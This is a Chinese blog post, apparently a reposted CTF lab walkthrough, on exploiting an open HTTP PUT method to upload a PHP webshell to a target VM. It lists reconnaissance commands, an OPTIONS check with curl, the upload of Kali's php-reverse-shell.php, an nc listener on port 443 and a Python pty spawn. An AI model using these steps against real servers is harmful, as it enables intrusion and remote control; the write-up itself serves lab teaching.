CTF-PUT上传漏洞

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

中间件包括apache、tomcat、IIS、weblogic等这些中间件可以设置支持的HTTP方法(HTTP方法包括GET、POST、HEAD、DELETE、PUT、OPTIONS等)

每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果间接开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。

直接上传shell,也可以从侧面反应PUT漏洞的严重危害性。

kali 192.168.20.128

靶机 192.168.20.137

链接:https://pan.baidu.com/s/1UUoIKTbq5UbyAgteYVIjNg ; 提取码:i59h 

nmap -sV 192.168.20.137

img

nmap -A -v -T4 192.168.20.137

img

探测敏感信息

nikto -host http://192.168.20.137

img

dirb http://192.168.20.137

img

深入挖掘

发现dirb扫描出两条连接

打开查看第一条

img

 img

第一条链接没有有效信息

打开查看第二条

img

是一个空目录,没有有效信息

owasp-zap扫描漏洞

img

img

imgimg  

没有扫描到高危漏洞

对敏感目录进行测试

curl -v -X OPTIONS http://192.168.20.137/test

img

该目录存在PUT漏洞

调用kali中的php

cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php

img

编辑shell.php

端口使用443是为了绕过防火墙

目录上传shell.php

下载插件RESTClient

img

发现rshell.php被成功上传

img

nc监听端口

nc -nlvp 443

img

执行rshell.php

img

反弹shell

img

发现不是root用户

启动终端

echo "import pty;pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125007033
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复